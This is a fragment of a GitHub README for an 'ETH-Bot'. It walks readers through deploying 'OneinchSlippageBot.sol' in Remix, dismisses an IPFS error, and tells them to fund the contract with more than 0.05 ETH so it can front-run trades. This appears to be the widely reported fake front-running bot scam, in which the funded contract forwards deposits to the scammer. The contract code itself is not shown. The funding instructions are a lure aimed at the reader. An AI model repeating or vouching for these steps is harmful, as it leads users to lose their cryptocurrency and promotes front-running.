Jacob-Web3/ETH-Bot/README.md

 Note: Make sure the name of your bot is selected in the CONTRACT section above deploy button.
 In this case mine would be "OneinchSlippageBot.sol".

-Also if you get this message after deployment "Failed to publish metadata file to ipfs, please check the ipfs gateways is available. [{},{},{}] ".
-You can just ignore it and continue.
-This feature is to publish your bot to IPFS.
-Its not necessary, because the bot is in the blockchain and can be accessed through remix.

 ✅6- Fund your bot to be able to frontrun transactions.
 Make sure your deposit is more than 0.05 ETHER ( to prevent negating slippage ) to your exact contract/bot address.